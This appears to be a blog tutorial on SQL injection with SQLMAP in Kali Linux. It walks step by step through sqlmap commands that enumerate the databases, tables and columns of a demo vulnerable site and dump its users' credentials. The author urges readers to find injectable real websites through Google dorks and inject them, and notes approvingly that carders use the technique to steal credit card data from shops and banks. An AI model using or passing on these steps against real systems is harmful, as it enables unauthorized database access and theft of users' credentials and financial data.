The use of databases for various data storage management has increased greatly in the development of web apps over time. The database facilities the intention between users and services. Databases or DBMS for short in the context of databases management systems offer various benefits, including data input and storage, retrieval of large information, and ease of compilation and grouping.
But, along with the ease and features provided by databases, there are many uses of databases in the worked of information and technology, especially in the development of website. Pen testers and hackers are Constantly trying to find vulnerabilities in the security of databases. This is confirmed by the report released by Positive Technologies Researchers, Information Security Research Centers in Europe, In the second quarter of 2017, the top 10 web application attacks were dominated by cross-site scripting of 39% and SQL Injection of 24% Positive Technologies said the second quarter's report is not much different from the first quarter.
What is SQL
SQL is Structured Query Language, which is a computer language for create, operate, storing, databases.
Why SQL
- Allows users to access data in the relational databases management system.
- Allows users to define the data in a database and manipulate that data.
- Allows users to create view, stored procedure, functions in databases.
SQL injection using SQLMAP in Kali Linux
Before we are doing injection attack, of course we should make sure that there is a database security hole in the server or target. To find database security holes, we can use several methods. Among them, Google dork is mostly used by hackers and penetration testers.
But today I will tell you only about SQL injection. you can find SQL injectable websites with the help of Google dork then you can inject the website.
Step 1 : Install SQLMAP on Kali Linux
In Kali Linux it's pre-installed but in other Linux operating systems you can install manually by following commands.
Type commands below into your terminal to install SQLMAP
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
As i mentioned ,SQLMAP is preinstalled in Kali Linux, you can call directly from the terminal, by typing 'sqlmap'. Now let's inject.
Step 2 : SQL injection using SQLMAP
Once we have found at least one SQL vulnerable website, we execute the attack using SQLMAP. I took one of them here to sample. First we need to reveal the name of the database, inside the databases there are tables and columns, which contain the data.
Target URL : testphp.vulnweb.com/artists.php?artist=1
Step 3 : Enumerate Databases
Command
sqlmap -u "target url" --dbs
So the command compiled would look like this
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs
From the command above, the result should be look like this
We got the database name "acuart"
Step 4 : Enumerate Tables
Command
sqlmap -u "target url" --tables -D "database name"
So the command compiled would look like this
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --tables -D acuart
The result should be look like this
Step 5 : Enumerate Columns
sqlmap -u "target url" --columns -D "database name" -T "table name"
So the command compiled would look like this
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --columns -D acuart -T users
The result should be look like this
The "users" table consists of 8 columns and this is actually a credential account. Let's dump that data.
Command
sqlmap -u "target url" --dump -D "database name" -T "table name" -C "column name"
So the command compiled would look like this
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dump -D acuart -T users -C uname,pass,address
Or you can also dump all data inside the table, using this command
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dump -D acuart -T user
The result should be look like this
We are not actually hacking into the target site, but at least we have learned a lot about SQL injection using SQLMAP Kali Linux easily and we dump the credentials. This technique is used mostly by carders (hackers who are looking for Credit Card accounts on E-commerce sites) which target financial, banking, shop, or e-commerce sites which store their user credit card information.




Post a Comment